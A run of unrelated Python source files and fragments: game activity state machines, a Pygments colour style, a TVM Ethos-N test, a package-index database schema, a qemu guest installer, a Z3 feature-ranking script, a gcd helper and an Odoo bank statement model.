            'Disabled': [],
        }


class CatchActivityFSM(BaseActivityFSM, IdleMixin, ActiveMixin, ConclusionMixin):
    """FSM for the catch activity; Conclusion loops back to Idle."""
    notify = DirectNotifyGlobal.directNotify.newCategory('CatchActivityFSM')

    def __init__(self, activity):
        CatchActivityFSM.notify.debug('__init__')
        BaseActivityFSM.__init__(self, activity)
        self.defaultTransitions = {
            'Idle': ['Active', 'Conclusion'],
            'Active': ['Conclusion'],
            'Conclusion': ['Idle'],
        }


class TrampolineActivityFSM(BaseActivityFSM, IdleMixin, RulesMixin, ActiveMixin):
    """FSM for the trampoline activity, with a Rules screen before play."""
    notify = DirectNotifyGlobal.directNotify.newCategory('TrampolineActivityFSM')

    def __init__(self, activity):
        TrampolineActivityFSM.notify.debug('__init__')
        BaseActivityFSM.__init__(self, activity)
        self.defaultTransitions = {
            'Idle': ['Rules', 'Active'],
            'Rules': ['Active', 'Idle'],
            'Active': ['Idle'],
        }


class DanceActivityFSM(BaseActivityFSM, IdleMixin, ActiveMixin, DisabledMixin):
    """FSM for the dance activity; toggles between Active and Disabled."""
    notify = DirectNotifyGlobal.directNotify.newCategory('DanceActivityFSM')

    def __init__(self, activity):
        DanceActivityFSM.notify.debug('__init__')
        BaseActivityFSM.__init__(self, activity)
        self.defaultTransitions = {
            'Active': ['Disabled'],
            'Disabled': ['Active'],
        }


class TeamActivityAIFSM(BaseActivityFSM, WaitForEnoughMixin, WaitToStartMixin, WaitClientsReadyMixin, ActiveMixin, ConclusionMixin):
    """Server-side FSM for team activities; every state can fall back to
    WaitForEnough when too many players leave."""
    notify = DirectNotifyGlobal.directNotify.newCategory('TeamActivityAIFSM')

    def __init__(self, activity):
        BaseActivityFSM.__init__(self, activity)
        self.notify.debug('__init__')
        self.defaultTransitions = {
            'WaitForEnough': ['WaitToStart'],
            'WaitToStart': ['WaitForEnough', 'WaitClientsReady'],
            'WaitClientsReady': ['WaitForEnough', 'Active'],
            'Active': ['WaitForEnough', 'Conclusion'],
            'Conclusion': ['WaitForEnough'],
        }


class TeamActivityFSM(BaseActivityFSM, WaitForEnoughMixin, WaitToStartMixin, RulesMixin, WaitForServerMixin, ActiveMixin, ConclusionMixin):
    """Client-side FSM for team activities; adds Rules and WaitForServer
    states between start and active play."""
    notify = DirectNotifyGlobal.directNotify.newCategory('TeamActivityFSM')

    def __init__(self, activity):
        BaseActivityFSM.__init__(self, activity)
        self.defaultTransitions = {
            'WaitForEnough': ['WaitToStart'],
            'WaitToStart': ['WaitForEnough', 'Rules'],
            'Rules': ['WaitForServer', 'Active', 'WaitForEnough'],
            'WaitForServer': ['Active', 'WaitForEnough'],
            'Active': ['Conclusion', 'WaitForEnough'],
            'Conclusion': ['WaitForEnough'],
        }
# -*- coding: utf-8 -*-
"""
    tomorrow night blue
    ---------------------

    Port of the Tomorrow Night Blue colour scheme
    https://github.com/chriskempson/tomorrow-theme
"""
from pygments.style import Style
from pygments.token import Keyword, Name, Comment, String, Error, Text, \
    Number, Operator, Generic, Whitespace, Punctuation, Other, Literal

# Palette taken from the upstream Tomorrow Night Blue theme.
BACKGROUND = "#002451"
CURRENT_LINE = "#00346e"
SELECTION = "#003f8e"
FOREGROUND = "#ffffff"
COMMENT = "#7285b7"
RED = "#ff9da4"
ORANGE = "#ffc58f"
YELLOW = "#ffeead"
GREEN = "#d1f1a9"
AQUA = "#99ffff"
BLUE = "#bbdaff"
PURPLE = "#ebbbff"


class TomorrownightblueStyle(Style):
    """
    Port of the Tomorrow Night Blue colour scheme
    https://github.com/chriskempson/tomorrow-theme
    """

    default_style = ''

    # Fix: background_color and highlight_color were each assigned twice
    # with identical values; the redundant duplicate pair was removed.
    background_color = BACKGROUND
    highlight_color = SELECTION

    styles = {
        # No corresponding class for the following:
        Text:                      FOREGROUND,  # class:  ''
        Whitespace:                "",          # class: 'w'
        Error:                     RED,         # class: 'err'
        Other:                     "",          # class 'x'

        Comment:                   COMMENT,     # class: 'c'
        Comment.Multiline:         "",          # class: 'cm'
        Comment.Preproc:           "",          # class: 'cp'
        Comment.Single:            "",          # class: 'c1'
        Comment.Special:           "",          # class: 'cs'

        Keyword:                   PURPLE,      # class: 'k'
        Keyword.Constant:          "",          # class: 'kc'
        Keyword.Declaration:       "",          # class: 'kd'
        Keyword.Namespace:         AQUA,        # class: 'kn'
        Keyword.Pseudo:            "",          # class: 'kp'
        Keyword.Reserved:          "",          # class: 'kr'
        Keyword.Type:              YELLOW,      # class: 'kt'

        Operator:                  AQUA,        # class: 'o'
        Operator.Word:             "",          # class: 'ow' - like keywords

        Punctuation:               FOREGROUND,  # class: 'p'

        Name:                      FOREGROUND,  # class: 'n'
        Name.Attribute:            BLUE,        # class: 'na' - to be revised
        Name.Builtin:              "",          # class: 'nb'
        Name.Builtin.Pseudo:       "",          # class: 'bp'
        Name.Class:                YELLOW,      # class: 'nc' - to be revised
        Name.Constant:             RED,         # class: 'no' - to be revised
        Name.Decorator:            AQUA,        # class: 'nd' - to be revised
        Name.Entity:               "",          # class: 'ni'
        Name.Exception:            RED,         # class: 'ne'
        Name.Function:             BLUE,        # class: 'nf'
        Name.Property:             "",          # class: 'py'
        Name.Label:                "",          # class: 'nl'
        Name.Namespace:            YELLOW,      # class: 'nn' - to be revised
        Name.Other:                BLUE,        # class: 'nx'
        Name.Tag:                  AQUA,        # class: 'nt' - like a keyword
        Name.Variable:             RED,         # class: 'nv' - to be revised
        Name.Variable.Class:       "",          # class: 'vc' - to be revised
        Name.Variable.Global:      "",          # class: 'vg' - to be revised
        Name.Variable.Instance:    "",          # class: 'vi' - to be revised

        Number:                    ORANGE,      # class: 'm'
        Number.Float:              "",          # class: 'mf'
        Number.Hex:                "",          # class: 'mh'
        Number.Integer:            "",          # class: 'mi'
        Number.Integer.Long:       "",          # class: 'il'
        Number.Oct:                "",          # class: 'mo'

        Literal:                   ORANGE,      # class: 'l'
        Literal.Date:              GREEN,       # class: 'ld'

        String:                    GREEN,       # class: 's'
        String.Backtick:           "",          # class: 'sb'
        String.Char:               FOREGROUND,  # class: 'sc'
        String.Doc:                COMMENT,     # class: 'sd' - like a comment
        String.Double:             "",          # class: 's2'
        String.Escape:             ORANGE,      # class: 'se'
        String.Heredoc:            "",          # class: 'sh'
        String.Interpol:           ORANGE,      # class: 'si'
        String.Other:              "",          # class: 'sx'
        String.Regex:              "",          # class: 'sr'
        String.Single:             "",          # class: 's1'
        String.Symbol:             "",          # class: 'ss'

        Generic:                   "",          # class: 'g'
        Generic.Deleted:           RED,         # class: 'gd',
        Generic.Emph:              "italic",    # class: 'ge'
        Generic.Error:             "",          # class: 'gr'
        Generic.Heading:           "bold " + FOREGROUND,  # class: 'gh'
        Generic.Inserted:          GREEN,       # class: 'gi'
        Generic.Output:            "",          # class: 'go'
        Generic.Prompt:            "bold " + COMMENT,     # class: 'gp'
        Generic.Strong:            "bold",      # class: 'gs'
        Generic.Subheading:        "bold " + AQUA,        # class: 'gu'
        Generic.Traceback:         "",          # class: 'gt'
    }
# Test-suite scaffold for PyFoam's ConvertToCSV application.  The
# application class is imported so this module fails fast if it is
# missing, but no test cases have been registered in the suite yet.
import unittest

from PyFoam.Applications.ConvertToCSV import ConvertToCSV

# Aggregate suite for this module; currently empty (cases to be added).
theSuite=unittest.TestSuite()
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.

"""Arm(R) Ethos(TM)-N integration mean tests"""

import numpy as np
import tvm
from tvm import relay
from tvm.testing import requires_ethosn
from . import infrastructure as tei


def _get_model(shape, axis, keepdims, input_zp, input_sc, output_zp, output_sc, dtype):
    """Build a quantized-mean Relay expression.

    The input is cast to int32 so the mean is computed without overflow,
    then requantized back to ``dtype`` with the given zero points/scales.

    shape -- input tensor shape
    axis -- axes to reduce over
    keepdims -- whether reduced axes are kept with length 1
    input_zp/input_sc -- quantization zero point/scale of the input
    output_zp/output_sc -- quantization zero point/scale of the output
    dtype -- quantized storage dtype (e.g. "uint8")
    """
    a = relay.var("a", shape=shape, dtype=dtype)
    casted = relay.op.cast(a, "int32")
    mean = relay.mean(casted, axis, keepdims)
    model = relay.qnn.op.requantize(
        mean,
        input_scale=relay.const(input_sc, "float32"),
        input_zero_point=relay.const(input_zp, "int32"),
        output_scale=relay.const(output_sc, "float32"),
        output_zero_point=relay.const(output_zp, "int32"),
        out_dtype=dtype,
    )
    return model


@requires_ethosn
def test_mean():
    """Compare the mean operator between CPU and NPU execution."""
    # One NHWC 4-D case and one 3-D case; both reduce axes [1, 2].
    trials = [(1, 7, 7, 2048), (1, 8, 8)]

    np.random.seed(0)
    for shape in trials:
        inputs = {
            "a": tvm.nd.array(np.random.randint(0, high=255, size=shape, dtype="uint8")),
        }
        outputs = []
        for npu in [False, True]:
            # zero point 128 / scale 0.0784314 -- presumably matches the
            # Ethos-N supported quantization for mean; confirm against the
            # NPU support library docs.
            model = _get_model(shape, [1, 2], True, 128, 0.0784314, 128, 0.0784314, "uint8")
            mod = tei.make_module(model, [])
            outputs.append(tei.build_and_run(mod, inputs, 1, {}, npu=npu))

        # Results from host and NPU runs must agree.
        tei.verify(outputs, "uint8", 1)
, onupdate="CASCADE", ondelete="CASCADE", ), ) cookies = Table( "cookies", db.metadata, Column("cookie", Text(), primary_key=True, nullable=False), Column( "name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), Column("last_seen", DateTime(timezone=False)), ) Index("cookies_last_seen", cookies.c.last_seen) csrf_tokens = Table( "csrf_tokens", db.metadata, Column( "name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), primary_key=True, nullable=False, ), Column("token", Text()), Column("end_date", DateTime(timezone=False)), ) description_urls = Table( "description_urls", db.metadata, Column("id", Integer(), primary_key=True, nullable=False), Column("name", Text()), Column("version", Text()), Column("url", Text()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ), ) Index("description_urls_name_idx", description_urls.c.name) Index( "description_urls_name_version_idx", description_urls.c.name, description_urls.c.version, ) dual = Table( "dual", db.metadata, Column("dummy", Integer()), ) mirrors = Table( "mirrors", db.metadata, Column("ip", Text(), primary_key=True, nullable=False), Column("user_name", CIText(), ForeignKey("accounts_user.username")), Column("index_url", Text()), Column("last_modified_url", Text()), Column("local_stats_url", Text()), Column("stats_url", Text()), Column("mirrors_url", Text()), ) oauth_access_tokens = Table( "oauth_access_tokens", db.metadata, Column("token", String(32), primary_key=True, nullable=False), Column("secret", String(64), nullable=False), Column("consumer", String(32), nullable=False), Column("date_created", Date(), nullable=False), Column("last_modified", Date(), nullable=False), Column( "user_name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), ) oauth_consumers = Table( "oauth_consumers", db.metadata, Column("consumer", String(32), 
primary_key=True, nullable=False), Column("secret", String(64), nullable=False), Column("date_created", Date(), nullable=False), Column( "created_by", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ), ), Column("last_modified", Date(), nullable=False), Column("description", String(255), nullable=False), ) oauth_nonce = Table( "oauth_nonce", db.metadata, Column("timestamp", Integer(), nullable=False), Column("consumer", String(32), nullable=False), Column("nonce", String(32), nullable=False), Column("token", String(32)), ) oauth_request_tokens = Table( "oauth_request_tokens", db.metadata, Column("token", String(32), primary_key=True, nullable=False), Column("secret", String(64), nullable=False), Column("consumer", String(32), nullable=False), Column("callback", Text()), Column("date_created", Date(), nullable=False), Column( "user_name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), ) oid_associations = Table( "oid_associations", db.metadata, Column("server_url", String(2047), primary_key=True, nullable=False), Column("handle", String(255), primary_key=True, nullable=False), Column("secret", LargeBinary(128), nullable=False), Column("issued", Integer(), nullable=False), Column("lifetime", Integer(), nullable=False), Column("assoc_type", String(64), nullable=False), CheckConstraint( "length(secret) <= 128", name="secret_length_constraint", ), ) oid_nonces = Table( "oid_nonces", d
b.metadata, Column("server_url", String(2047), primary_key=True, nullable=False), Column("timestamp", Integer(), primary_key=True, nullable=False), Column("salt", String(40), primary_key=True, nullable=False), ) openid_discovered = Table( "ope
nid_discovered", db.metadata, Column("url", Text(), primary_key=True, nullable=False), Column("created", DateTime(timezone=False)), Column("services", LargeBinary()), Column("op_endpoint", Text()), Column("op_local", Text()), ) openid_nonces = Table( "openid_nonces", db.metadata, Column("created", DateTime(timezone=False)), Column("nonce", Text()), ) Index("openid_nonces_created", openid_nonces.c.created) Index("openid_nonces_nonce", openid_nonces.c.nonce) openid_sessions = Table( "openid_sessions", db.metadata, Column("id", Integer(), primary_key=True, nullable=False), Column("url", Text()), Column("assoc_handle", Text()), Column("expires", DateTime(timezone=False)), Column("mac_key", Text()), ) openid_whitelist = Table( "openid_whitelist", db.metadata, Column("name", Text(), primary_key=True, nullable=False), Column("trust_root", Text(), primary_key=True, nullable=False), Column("created", DateTime(timezone=False)), ) openids = Table( "openids", db.metadata, Column("id", Text(), primary_key=True, nullable=False), Column( "name", CIText(), ForeignKey( "accounts_user.username", onupdate="CASCADE", ondelete="CASCADE", ), ), ) ratings = Table( "ratings", db.metadata, Column("id", Integer(), primary_key=True, nullable=False), Column("name", Text(), nullable=False), Column("version", Text(), nullable=False), Column( "user_name", CIText(), ForeignKey( "accounts_user.username", ondelete="CASCADE", ), nullable=False ), Column("date", DateTime(timezone=False)), Column("rating", Integer()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ondelete="CASCADE", ), UniqueConstraint("name", "version", "user_name", name="ratings_name_key"), ) Index("rating_name_version", ratings.c.name, ratings.c.version) rego_otk = Table( "rego_otk", db.metadata, Column( "name", CIText(), ForeignKey( "accounts_user.username", ondelete="CASCADE", ), ), Column("otk", Text()), Column("date", DateTime(timezone=False)), UniqueConstraint("otk", 
name="rego_otk_unique"), ) Index("rego_otk_name_idx", rego_otk.c.name) Index("rego_otk_otk_idx", rego_otk.c.otk) release_requires_python = Table( "release_requires_python", db.metadata, Column("name", Text()), Column("version", Text()), Column("specifier", Text()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ), ) Index("rel_req_python_name_idx", release_requires_python.c.name) Index( "rel_req_python_name_version_idx", release_requires_python.c.name, release_requires_python.c.version, ) Index("rel_req_python_version_id_idx", release_requires_python.c.version) release_urls = Table( "release_urls", db.metadata, Column("name", Text()), Column("version", Text()), Column("url", Text()), Column("packagetype", Text()), ForeignKeyConstraint( ["name", "version"], ["releases.name", "releases.version"], onupdate="CASCADE", ), ) Index("release_urls_name_idx", release_urls.c.name) Index("release_urls_packagetype_idx", release_urls.c.packagetype) Index("release_urls_version_idx", release_urls.c.version) sshkeys = Table( "sshkeys", db.metadata,
#!/usr/bin/env python import os import os.path path = "source" import doctest for f in os.listdir(path): if f.endswith(".txt"):
print f doctest.testfile(os.path.join(path, f), module_relative=False)
"""
Virtualization installation functions.

Copyright 2007-2008 Red Hat, Inc.
Michael DeHaan <mdehaan@redhat.com>

This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301 USA

module for creating fullvirt guests via KVM/kqemu/qemu
requires python-virtinst-0.200.
"""

# NOTE(review): tempfile is imported twice, and OptionParser/time/stat/
# exceptions/errno/shutil/mac appear unused in this chunk -- presumably
# used elsewhere or leftovers; confirm before cleaning up.
import os, sys, time, stat
import tempfile
import random
from optparse import OptionParser
import exceptions
import errno
import re
import tempfile
import shutil
import virtinst
import app as koan
import sub_process as subprocess
import utils

def random_mac():
    """
    from xend/server/netif.py
    Generate a random MAC address.
    Uses OUI 00-16-3E, allocated to
    Xensource, Inc. Last 3 fields are random.
    return: MAC address string
    """
    # First three octets are the fixed Xensource OUI; the last three are
    # random (first of them capped at 0x7f).
    mac = [ 0x00, 0x16, 0x3e,
        random.randint(0x00, 0x7f),
        random.randint(0x00, 0xff),
        random.randint(0x00, 0xff) ]
    return ':'.join(map(lambda x: "%02x" % x, mac))


def start_install(name=None, ram=None, disks=None, mac=None, uuid=None,
                  extra=None, vcpus=None, profile_data=None, arch=None,
                  no_gfx=False, fullvirt=True, bridge=None, virt_type=None,
                  virt_auto_boot=False):
    """
    Build and launch a fully-virtualised guest via virtinst.

    profile_data is a dict produced from the cobbler profile; it selects
    the install source (CD/image vs. install tree), OS hints, disks and
    NIC/bridge layout.  Returns a human-readable status string.

    NOTE(review): mac, no_gfx, fullvirt, virt_type and virt_auto_boot are
    accepted but never read in this body (mac is rebound inside the
    interface loop) -- presumably kept for interface parity with the
    other koan virt modules; confirm before removing.
    """
    # Pick the best available hypervisor type: kvm > kqemu > plain qemu.
    vtype = "qemu"
    if virtinst.util.is_kvm_capable():
        vtype = "kvm"
        arch = None # let virtinst.FullVirtGuest() default to the host arch
    elif virtinst.util.is_kqemu_capable():
        vtype = "kqemu"
    print "- using qemu hypervisor, type=%s" % vtype

    # Normalize 32-bit x86 names to what virtinst expects.
    if arch is not None and arch.lower() in ["x86","i386"]:
        arch = "i686"

    guest = virtinst.FullVirtGuest(hypervisorURI="qemu:///system",type=vtype, arch=arch)

    if not profile_data.has_key("file"):
        # images don't need to source this
        if not profile_data.has_key("install_tree"):
            raise koan.InfoException("Cannot find install source in kickstart file, aborting.")

        if not profile_data["install_tree"].endswith("/"):
            profile_data["install_tree"] = profile_data["install_tree"] + "/"

        # virt manager doesn't like nfs:// and just wants nfs:
        # (which cobbler should fix anyway)
        profile_data["install_tree"] = profile_data["install_tree"].replace("nfs://","nfs:")

    if profile_data.has_key("file"):
        # this is an image based installation
        input_path = profile_data["file"]
        print "- using image location %s" % input_path
        if input_path.find(":") == -1:
            # this is not an NFS path
            guest.cdrom = input_path
        else:
            # NFS-hosted image: mount it locally first.
            (tempdir, filename) = utils.nfsmount(input_path)
            guest.cdrom = os.path.join(tempdir, filename)

        kickstart = profile_data.get("kickstart","")
        if kickstart != "":
            # we have a (windows?) answer file we have to provide
            # to the ISO.
            print "I want to make a floppy for %s" % kickstart
            floppy_path = utils.make_floppy(kickstart)
            guest.disks.append(virtinst.VirtualDisk(device=virtinst.VirtualDisk.DEVICE_FLOPPY, path=floppy_path))
    else:
        # Tree-based install: pass the tree URL plus extra kernel args.
        guest.location = profile_data["install_tree"]
        extra = extra.replace("&","&amp;")
        guest.extraargs = extra

    # Map the cobbler "breed"/"os_version" hints onto virtinst OS metadata.
    if profile_data.has_key("breed"):
        breed = profile_data["breed"]
        if breed != "other" and breed != "":
            if breed in [ "debian", "suse", "redhat" ]:
                guest.set_os_type("linux")
            elif breed in [ "windows" ]:
                guest.set_os_type("windows")
            else:
                guest.set_os_type("unix")
        if profile_data.has_key("os_version"):
            # FIXME: when os_version is not defined and it's linux, do we use generic24/generic26 ?
            version = profile_data["os_version"]
            if version != "other" and version != "":
                try:
                    guest.set_os_variant(version)
                except:
                    print "- virtinst library does not understand variant %s, treating as generic" % version
                    pass

    guest.set_name(name)
    guest.set_memory(ram)
    guest.set_vcpus(vcpus)

    # for KVM, we actually can't disable this, since it's the only
    # console it has other than SDL
    guest.set_graphics("vnc")

    if uuid is not None:
        guest.set_uuid(uuid)

    for d in disks:
        print "- adding disk: %s of size %s" % (d[0], d[1])
        if d[1] != 0 or d[0].startswith("/dev"):
            guest.disks.append(virtinst.VirtualDisk(d[0], size=d[1]))
        else:
            raise koan.InfoException("this virtualization type does not work without a disk image, set virt-size in Cobbler to non-zero")

    if profile_data.has_key("interfaces"):

        counter = 0
        interfaces = profile_data["interfaces"].keys()
        interfaces.sort()
        vlanpattern = re.compile("[a-zA-Z0-9]+\.[0-9]+")
        for iname in interfaces:
            intf = profile_data["interfaces"][iname]

            # Skip bonding masters, VLAN sub-interfaces and aliases --
            # they don't get their own guest NIC.
            if intf["bonding"] == "master" or vlanpattern.match(iname) or iname.find(":") != -1:
                continue

            mac = intf["mac_address"]
            if mac == "":
                mac = random_mac()

            if bridge is None:
                # No explicit bridge: fall back to per-interface, then
                # per-profile bridge settings.
                profile_bridge = profile_data["virt_bridge"]

                intf_bridge = intf["virt_bridge"]
                if intf_bridge == "":
                    if profile_bridge == "":
                        raise koan.InfoException("virt-bridge setting is not defined in cobbler")
                    intf_bridge = profile_bridge

            else:
                # Explicit bridge(s): a comma-separated list assigns one
                # bridge per NIC in order.
                if bridge.find(",") == -1:
                    intf_bridge = bridge
                else:
                    bridges = bridge.split(",")
                    intf_bridge = bridges[counter]

            nic_obj = virtinst.VirtualNetworkInterface(macaddr=mac, bridge=intf_bridge)
            guest.nics.append(nic_obj)
            counter = counter + 1

    else:
        # No interface data: create a single NIC with a random MAC.
        if bridge is not None:
            profile_bridge = bridge
        else:
            profile_bridge = profile_data["virt_bridge"]

        if profile_bridge == "":
            raise koan.InfoException("virt-bridge setting is not defined in cobbler")

        nic_obj = virtinst.VirtualNetworkInterface(macaddr=random_mac(), bridge=profile_bridge)
        guest.nics.append(nic_obj)

    guest.start_install()

    return "use virt-manager and connect to qemu to manage guest: %s" % name
features[str(feature)] = currWeight sorted_features = sorted(features.iteritems(), key=operator.itemgetter(1)) sorted_features = [(features_str[f],abs(w)) for (f, w) in sorted_features] #sorted_features.reverse() return sorted_features def getBestForAbsoluteNormalized(weights, ranges, num_consumers): ''' weights is a list of triples: (objective, weight, feature) Sort features according to weights, where the weight of a feature is defined as: weight(f:feature) = abs(Sum("f's weights in maximize objectives") - Sum("f's weights in minimize objectives")) ...might be better to look at std dev. ''' features = {} features_str = {} #print weights (maxes, mins) = ranges metrics_variables_string = [str(i) for i in metrics_variables] #print weights for i in weights: (objective, weight, feature) = i if features.get(str(feature)): currWeight = features[str(feature)] else: currWeight = 0 features_str[str(feature)] = feature #print objective polarity = metrics_objective_direction[metrics_variables_string.index(str(objective))] #print objective if maxes[str(objective)] - mins[str(objective)] == 0: currWeight = currWeight + 1 elif(polarity == METRICS_MAXIMIZE): currWeight = currWeight + (float(weight) - mins[str(objective)]) / (maxes[str(objective)] - mins[str(objective)]) else: currWeight = currWeight + (maxes[str(objective)] - float(weight)) / (maxes[str(objective)] - mins[str(objective)]) features[str(feature)] = currWeight sorted_features = sorted(features.iteritems(), key=operator.itemgetter(1)) sorted_features = [(features_str[f],abs(w)) for (f, w) in sorted_features] #print sorted_features #sorted_features.reverse()
return sorted_features def getBestMinusWorst(weights, ranges, num_consumers): features = {} features_str = {} #print weights
(maxes, mins) = ranges metrics_variables_string = [str(i) for i in metrics_variables] #print weights for i in weights: (objective, weight, feature) = i if features.get(str(feature)): currWeight = features[str(feature)] else: currWeight = (1, 0) features_str[str(feature)] = feature #print objective (currMin, currMax) = currWeight polarity = metrics_objective_direction[metrics_variables_string.index("total_" + str(objective))] #print objective if maxes[str(objective)] - mins[str(objective)] == 0: denom = 1 else: denom = (maxes[str(objective)] - mins[str(objective)]) if(polarity == METRICS_MAXIMIZE): newWeight = (float(weight) - mins[str(objective)]) /denom else: newWeight = (maxes[str(objective)] - float(weight)) / denom #print features #print(newWeight if newWeight < currMin else currMin) #print newWeight features[str(feature)] = (newWeight if newWeight < currMin else currMin, newWeight if newWeight > currMax else currMax) for i in features.keys(): (l, r) = features.get(i) features[i] = r - l sorted_features = sorted(features.iteritems(), key=operator.itemgetter(1)) sorted_features = [(features_str[f],abs(w)) for (f, w) in sorted_features] #print sorted_features #sorted_features.reverse() return sorted_features def getBestByName(num_consumers, weights, names): #need to clean features=[] for i in weights: (name, weight) = i if str(name) in names: #print name features.append((name,weight)) ''' while names: for i in weights: (_, _, feature) = i if str(feature) == names[0]: print names[0] features.append((feature,1)) names.pop(0) break ''' #print features return features def getBestFeatures(heuristic, weights, ranges, num_consumers, names): if heuristic == GREATEST_TOTAL_WEIGHT: print("Obsolete, do not use. 
") #sys.exit() return getBestForGreatestTotalWeight(num_consumers) elif heuristic == ABSOLUTE_NORMALIZED: return getBestForAbsoluteNormalized(weights, ranges, num_consumers) elif heuristic == BY_NAME: #initial_list = getBestForAbsoluteNormalized(weights, ranges, num_consumers) #initial_list.reverse() initial_list = getBestMinusWorst(weights, ranges, num_consumers) return getBestByName(num_consumers, initial_list, names) def getZ3Feature(feature, expr): if(str(expr) == feature): return expr for child in expr.children(): result = getZ3Feature(feature, child) if result: return result return [] ABSOLUTE_NORMALIZED = 1 GREATEST_TOTAL_WEIGHT = 2 BY_NAME = 3 CONFIG=False RECORDPOINT = False if __name__ == '__main__': print("Running: " + str(sys.argv)) if len(sys.argv) < 6: RECORDPOINT= False elif sys.argv[5] == "1": RECORDPOINT = True if sys.argv[4] == "1": CONFIG = True else: CONFIG = False #print CONFIG if sys.argv[4] == "2": BETTER_CONFIG = True else: BETTER_CONFIG = False if sys.argv[1] == "BDB": from Z3ModelBerkeleyDB import * csvfile = './bdb_attributes.csv' if CONFIG: names = bdb_config_split_names elif BETTER_CONFIG: sys.exit("bdb not set up for better config.") else: names = bdb_optional_names elif sys.argv[1] == "ERS": csvfile = './ers_attributes.csv' from Z3ModelEmergencyResponseOriginal import * if CONFIG: names = ers_config_split_names elif BETTER_CONFIG: names = ers_better_config_names else: names = ers_optional_names elif sys.argv[1] == "ESH": RECORDPOINT=True from Z3ModelEShopOriginal import * csvfile = './eshop_attributes.csv' if CONFIG: names = eshop_config_split_names elif BETTER_CONFIG: names = eshop_better_config_names else: names = eshop_optional_names elif sys.argv[1] == "WPT": csvfile = './wpt_attributes.csv' from Z3ModelWebPortalUpdate import * #names=["ban_flash", "keyword", "popups", "text"] if CONFIG: names = webportal_config_split_names elif BETTER_CONFIG: names = webportal_better_config_names else: names = webportal_optional_names else: 
print("passed") sys.exit() outputFileParentName = sys.argv[2] num_consumers = int(sys.argv[3]) num_groups = num_consumers / 2 if not is_power2(num_consumers): sys.exit("Number of consumers must be a power of 2.") weights = extractWeights(csvfile) #print weights ranges = getWeightRanges(weights) sorted_features = getBestFeatures(BY_NAME, weights, ranges, num_consumers, names) num_desired_features = int(math.log(num_consumers, 2))-1 #i didnt reverse, but also try middle of the pack sorted_features.reverse() print sorted_features #random.shuffle(sorted_features) desired_features = [i for (i, _) in sorted_features][:num_desired_features] #desired_features = [i for (i, _) in sorted_features][(len(sorted_features)-num_desired_features)/2: # (len(sorted_features)-num_desired_features)/2 + num_desired_features] #print desired_features new_desired_features= [] for i in desired_features: for j in s.assertions(): result = getZ3Feature(i, j) if result: new_desired_features.append(result) break desired_features = new_desired_features
# Batch-convert a directory of documents into a pickled pandas DataFrame.
#
# Usage: python <script> <input_dir> <output_pickle>
import load_data as ld
import sys
import os

# Every entry in the input directory is treated as a document to process.
f_list = os.listdir(sys.argv[1])

# processAllDocuments parses each listed file; loadIntoPandas collects the
# results.  NOTE(review): assumes loadIntoPandas returns a pandas DataFrame
# (to_pickle is called on it) -- confirm against load_data's implementation.
data = ld.loadIntoPandas(ld.processAllDocuments(sys.argv[1], f_list))
data.to_pickle(sys.argv[2])
try:
    # fractions.gcd was removed in Python 3.9; math.gcd exists since 3.5
    # and returns the same value for the positive integers used here.
    from math import gcd
except ImportError:  # very old interpreters only
    from fractions import gcd

from functools import reduce


def greatest_common_divisor(*args):
    """Return the greatest common divisor of the given integers.

    Accepts one or more arguments.  (The original popped two values
    unconditionally and so crashed with IndexError on a single argument;
    a single argument now simply yields itself.)

    Raises TypeError when called with no arguments.
    """
    if not args:
        raise TypeError("greatest_common_divisor() requires at least one argument")
    # gcd is associative, so folding pairwise over all arguments is
    # equivalent to the original manual pop-and-loop implementation.
    return reduce(gcd, args)


def test_function():
    assert greatest_common_divisor(6, 10, 15) == 1, "12"
    assert greatest_common_divisor(6, 4) == 2, "Simple"
    assert greatest_common_divisor(2, 4, 8) == 2, "Three arguments"
    assert greatest_common_divisor(2, 3, 5, 7, 11) == 1, "Prime numbers"
    assert greatest_common_divisor(3, 9, 3, 9) == 3, "Repeating arguments"

if __name__ == '__main__':
    test_function()
ass AccountBankStatementLine(models.Model): _name = "account.bank.statement.line" _description = "Bank Statement Line" _order = "statement_id desc, sequence" _inherit = ['ir.needaction_mixin'] name = fields.Char(string='Memo', required=True) date = fields.Date(required=True, default=lambda self: self._context.get('date', fields.Date.context_today(self))) amount = fields.Monetary(digits=0, currency_field='journal_currency_id') journal_currency_id = fields.Many2one('res.currency', related='statement_id.currency_id', help='Utility field to express amount currency', readonly=True) partner_id = fields.Many2one('res.partner', string='Partner') bank_account_id = fields.Many2one('res.partner.bank', string='Bank Account') account_id = fields.Many2one('account.account', string='Counterpart Account', domain=[('deprecated', '=', False)], h
elp="This technical field can be used at the statement line creation/import time in order to avoid the reconciliation" " process on it later on. The statement line will simply create a counterpart on this account") statement_id = fields
